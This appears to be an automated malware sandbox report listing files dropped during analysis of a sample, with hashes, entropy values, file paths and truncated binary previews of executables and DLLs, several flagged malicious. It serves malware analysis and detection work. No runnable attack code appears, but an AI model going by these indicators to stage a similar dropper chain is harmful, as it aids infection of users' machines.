File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btgipqvy.3ow.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kud1n0yz.5tt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnntxbro.phg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opqkpmme.fxl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r53zyiza.5hc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu

Download File

Process:	C:\Windows\SysWOW64\more.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	311808
Entropy (8bit):	6.838546349295719
Encrypted:	false
SSDEEP:	6144:t5g9PjKfx5xWc/SW7wP+wkdGdfJ7rLRjqPz6LLi:tG9PjOxWca1OYfJjomC
MD5:	02522A466B7EB24788120FE94D0EA99A
SHA1:	A1A4E6490099437B88FCAA8D9367F3C9009A4644
SHA-256:	C940F003D68479BC791145974A859697A8CD5F2E5D71A08D6FAE8B1188FF12EA
SHA-512:	136BD178A5F714EA1212639AAFA1F91F0FB96933F9B4406C6A10E8966C55A90BDD6F88E8D26BEFE9C39E1BCA69854C360058B2C88A763E39B4AF6B65115D0FB9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....!Z..........................................@.......................................@..................................+...............................P...<...................................................-...............................text............................... ..`.rdata... ......."..................@..@.data...`....@...X..................@....CRT.........@.......r..............@..@.reloc...<...P...>...t..............@..Basi.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7298135275419164
Encrypted:	false
SSDEEP:	96:2ACP33CxHah6kvhkvCCtE3W3tr+HH3W3tr+HI:2DPy6h2E3WJC3WJD
MD5:	621C1848DA4AB10ED8512CC494F8B8FF
SHA1:	FAFCB02FAB264812626D06B7226117E8902CC571
SHA-256:	0DF8F7CDD66BF238D138FE770CCF1BE8586E87C351EB4D40959F8E49B88BD11D
SHA-512:	6099557F2C061818347D56100A685EDF2DFEA266B92707CE558573D760E3F0377B60B26EADC90FE25359D6451384BE0AADD647D7C1E0896CCA5529362E722FBA
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....dWQ>..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......'SQ>....wWQ>......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^xY.I...........................%..A.p.p.D.a.t.a...B.V.1.....xY.I..Roaming.@......CW.^xY.I..........................t...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^xY.I..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................s..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^xY.I....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HTDXA73KRF1ZYBJQQZU0.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7298135275419164
Encrypted:	false
SSDEEP:	96:2ACP33CxHah6kvhkvCCtE3W3tr+HH3W3tr+HI:2DPy6h2E3WJC3WJD
MD5:	621C1848DA4AB10ED8512CC494F8B8FF
SHA1:	FAFCB02FAB264812626D06B7226117E8902CC571
SHA-256:	0DF8F7CDD66BF238D138FE770CCF1BE8586E87C351EB4D40959F8E49B88BD11D
SHA-512:	6099557F2C061818347D56100A685EDF2DFEA266B92707CE558573D760E3F0377B60B26EADC90FE25359D6451384BE0AADD647D7C1E0896CCA5529362E722FBA
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....dWQ>..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......'SQ>....wWQ>......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^xY.I...........................%..A.p.p.D.a.t.a...B.V.1.....xY.I..Roaming.@......CW.^xY.I..........................t...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^xY.I..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................s..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^xY.I....Q...........

C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.604555317326718
Encrypted:	false
SSDEEP:	49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
MD5:	17D26D22913C19D7A93F7F6AF7EC5D95
SHA1:	0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
SHA-256:	E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
SHA-512:	FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: gkzHdqfg.ps1, Detection: malicious, Browse Filename: WiFiPrivacyInstallation.exe, Detection: malicious, Browse Filename: WiFiPrivacyInstallation.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: myp0912.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	669792
Entropy (8bit):	6.967035663118671
Encrypted:	false
SSDEEP:	12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
MD5:	F75225DB13E3B86477DC8658C63F9B99
SHA1:	6FFD5596FD69E161B788001ABAB195CC609476CF
SHA-256:	4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
SHA-512:	07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d...................."..`........B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\isjii

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	Atari 68xxx CPX file (version 4d53)
Category:	dropped
Size (bytes):	15400
Entropy (8bit):	5.921776181449881
Encrypted:	false
SSDEEP:	192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
MD5:	744424FBBAC9BBA03E53DEA3587E327E
SHA1:	B1CD89346897AA9A0787336B44E638E231B3CC15
SHA-256:	E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
SHA-512:	7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
Malicious:	false
Preview:	.do.....MS...dYIL.Ws....eFR..Dja......[uau..G..C...L.Z.j..Hh....R.._wy.Y..k.pH....sF..G.gO._.G_...DTg..[Q.C...Dg.MK.........NWRLDZQ..wagV...EyP.R.g.Ui..Q.j......vS.p.....l..q..IRr.c...R......q....YAh...aCH..A..s.v...[.mrgRfqX.w.JR...y.....pY.X.s.HuyH..q......^v.N.V\_j.x.k.....X`fRo....sC.Cl....^MaMu..G.i..v].g......jIpS.........`kIv.t..^.a.^dNU....W.M..o...Z.S.Sc.C.c.i.b...UC.I[hIV.BCsLm...jKJ.....y..fcb.EpM..V....u..U.n..`g...c.b..E..r...OGt.Lm..sn.t.YRB..\nSB..vH.w..r.V...w.Sq.Fu...bX.W.....cl....q....GI...s..K.[..H.XX.X`.x`a.I......T..d[..w.R..Nn.Oe.v.u.....d....kVZ..\nX.i.t.v_foubdB...cgeOA.....\Wi.Za.UL.....A...fr.a.CJ.BPCI.x.v...J.n.MI._.[.Y.[Wd...G.C.Wi.cVK..d.lA..p...DH.R.X...u.g.P.[......V...rOhI.g.Ej.M^..x.h......iK.Q.rC..xQj.Rr]D]O..J..fE.YwCMX....me.Sr..c..iD.s...eEt.GnAZL....T.pqlCF.u.TVp[...r.H..].b...kYMo.U.GN...C..mRD...tbPgE.B........l.I..]HA.Xu....Yy..w.mKI.mK.M.....Ra..^ATWdq.....QOu._.ILk.....b...\cbU..a.ENV..eO.QnAVv.....r...o.h.w.Swr..J....beH.^Wl..YFK...Ukqaba...

C:\Users\user\AppData\Roaming\UPEC\looelll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	798054
Entropy (8bit):	7.892501542250156
Encrypted:	false
SSDEEP:	12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
MD5:	150E5E57AE9177A2CD6E587DF2D3B0EA
SHA1:	88C981FB86B2624165CD1FAB41F2C7CCEB57151F
SHA-256:	1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
SHA-512:	361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
Malicious:	false
Preview:	_B\MW.k............L.Ej\...p....c..kC..jZf.`rtk..T.gZ...s.Ktio.Lb.SZl...BDdm..vw.....ur..CcE.K..Kv.QXjP....vJ.LB.M..vasa..cYq..m..p.Rv...SRAp.]..l.^....PqY.`mt.W.dHKl.a.d.iX...ns.O.aHa......GJX......_`n..\Q..vW..H.a..fonSOSi.`Eh.Gm..]IH.t.J..MtMhf..W.O....h...r.j..y..x.._.g.b.S...P\..^.....w.........b.nFh..SA..i.VS\B.P.K.tn..U.I.[..`Fl.b..W......`...N....v.Ve...A.......Y.e.].xK...C.S..US......cqW.I.Z`ptM.B.....GOngM.VVabAxP..c..O.HC...^.G.nWl..........rp._.nAM.I.h..r...fut....r.xq..xCW....fWS]Y.Fs..p.B..VxHXyMH..Gub._Yt.CVa.\.OJaw.c^A..._Z.h....m..u.t.c]y.r.P._B....JRvGo.KJOl.xO.I..[....nL.c.r.MN....TkF._d.b.IIsjo..gB.D...s.NkS..oRBULqcY`bs.BIy.aW...K..to.WF..Lu...M.G..r.q..j...qETj.Kw.AyRg^_^Qc.G..S.JH.......f.x.v..Umb.Ll..N...cUtCwMi...P.P.....S.K.BQ^yILl.h._.l..x..B..Y.Q....jx^eNt..u..Gp.GI.S^G....i..P...W..r.......\.yaq^Up..imka.\.Nv.AaJdyC`cPA...D.V.Ov.o..t.f.pI.x`d.R..a.lS.\.p.UhDN....VXlEFcjMy...Ap..X...G.L^.B._W.Fxs]BK..^c..d......JIn]]C.]UwEC.VkF.TT...gBg...t..h..pv.....p`A.AD

C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\Data\NAudio.xml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1054613
Entropy (8bit):	4.601238684297783
Encrypted:	false
SSDEEP:	6144:HCH/qJhYLq2SudOFFEpSQjV2SFq3Pxl2ZRN6hhQvb/0nPubFnkFrAt:8FLZGFEnJt6hhQ0PykFY
MD5:	224D05879C6F2B9708EDBB7CF244E76E
SHA1:	5DB1157DDFEFFC4C30650B21F014530470EFE729
SHA-256:	8E58FFD1BA32AB7EAE118F2861ED1449F49A3CD0C459DF2AC26A1FF1BF4D7245
SHA-512:	D3CF29A37D3B5E1FAA7B8153FB2C21DB9A65868530C51D8E589CDD2E010674CD93610DDC10309D15DF07B6E9E6D6D892C8DB0E16E67638BF72BEAD9FC83E4AB9
Malicious:	false
Preview:	<?xml version="1.0"?>..<doc>.. <assembly>.. <name>NAudio</name>.. </assembly>.. <members>.. <member name="T:NAudio.Codecs.ALawDecoder">.. <summary>.. a-law decoder.. based on code from:.. http://hazelware.luggle.com/tutorials/mulawcompression.html.. </summary>.. </member>.. <member name="F:NAudio.Codecs.ALawDecoder.ALawDecompressTable">.. <summary>.. only 512 bytes required, so just use a lookup.. </summary>.. </member>.. <member name="M:NAudio.Codecs.ALawDecoder.ALawToLinearSample(System.Byte)">.. <summary>.. Converts an a-law encoded byte to a 16 bit linear sample.. </summary>.. <param name="aLaw">a-law encoded byte</param>.. <returns>Linear sample</returns>.. </member>.. <member name="T:NAudio.Codecs.ALawEncoder">.. <summary>.. A-law encoder.. </

C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	424552
Entropy (8bit):	6.000236226718345
Encrypted:	false
SSDEEP:	3072:bebeJQsqiaJnFdHfQoB9bls1YxRz5QZ1y+ymaQfA30KQBhYJXv4M4Mz07ROZH1pH:jh+nf4+tG/vyohq4M4M4gl7T
MD5:	A341D9BFAAE6A784CB9E2EA49C183FB4
SHA1:	D061C12DFFA6A725F649DAE49C99F157E93BB175
SHA-256:	52416BB8275988AA5145BE6359B6C6A92E3C20817544682C2C1978B50FF2052C
SHA-512:	9DFF4BA2ABF889C9F9E71DA1F91ABDDE1742A542B53E8C289E011113E1BCB86D4B1AAF5E7AADF97AA5ED36AB50227295E27CE700D30524F7198FD8F3928C36A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.. yx.syx.syx.sp.#sux.s...r{x.sl..rex.sl..rsx.sl..rzx.sl..r.x.syx.szx.syx.s.x.sO..r.x.sO.Osxx.syx'sxx.sO..rxx.sRichyx.s........PE..d....\.e.........."....%............4..........@...................................../....`..........................................................`...........F...R..h(...p..8"..PT..T............................S..@............................................text............................... ..`.rdata..............................@..@.data....a.......\..................@....pdata...F.......H..................@..@.rsrc........`.......&..............@..@.reloc..8"...p...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe.config

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	5.038231865445437
Encrypted:	false
SSDEEP:	24:2dV8F7H3p2/+XBPpZp2/+XBPqp2/+XBw1irkV:cVg7C+XBR4+XBn+XBvrE
MD5:	75E66AB540561A0C7D4160271F518243
SHA1:	AD6501E407D216744B6C3DE76D7664D9581EBAD2
SHA-256:	091AFFF3BB63024B5A7B14EA30306B6753858FD1A33FC8C98E3B5E65FE92FBE7
SHA-512:	FCB55C0FDBB984B06AFF2FAFCAEA2596C175AA5A07D2F1A401305D3441338AA266A53D2DE7A7577684884A2E12CE3EE430B2E1D0210684A7EEFAF9EAA0DE115F
Malicious:	false
